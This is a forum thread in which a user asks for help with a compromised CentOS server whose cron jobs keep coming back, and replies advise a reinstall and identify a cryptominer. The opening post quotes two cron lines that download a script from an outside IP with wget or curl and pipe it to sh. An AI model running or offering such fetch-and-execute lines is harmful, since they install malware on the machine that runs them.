problems with crontab tasks.
good day.
I have problems with a centos server that cron tasks are restored and creates the following tasks.
* / 26 * * * * wget -O--q http://5.188.87.12/langs/logo.jpg|sh
* / 25 * * * * curl http://5.188.87.12/langs/logo.jpg|sh
I request your support, since I have not managed to disinfect the server.
tasks Cron Infectado
Re: tasks Cron Infectado
If that is root's crontab then you need to backup your data, reinstall the system and then restore (carefully inspecting the restored data for any signs of compromise). You cannot recover from a root compromise safely. You can never be 100% sure that you have found all backdoors into the server.
The code there appears to be a bitcoin miner.
You should also attempt to locate how they got into your server in the first place. Make sure that your replacement install is fully up to date before you put it online.
The code there appears to be a bitcoin miner.
You should also attempt to locate how they got into your server in the first place. Make sure that your replacement install is fully up to date before you put it online.
The future appears to be RHEL or Debian. I think I'm going Debian.
Info for USB installs on http://wiki.centos.org/HowTos/InstallFromUSBkey
CentOS 5 and 6 are deadest, do not use them.
Use the FAQ Luke
Info for USB installs on http://wiki.centos.org/HowTos/InstallFromUSBkey
CentOS 5 and 6 are deadest, do not use them.
Use the FAQ Luke
Re: tasks Cron Infectado
For the record, I've also sent a note about this to the abuse email addresses of the two affected ISPs so that they would shut down those servers.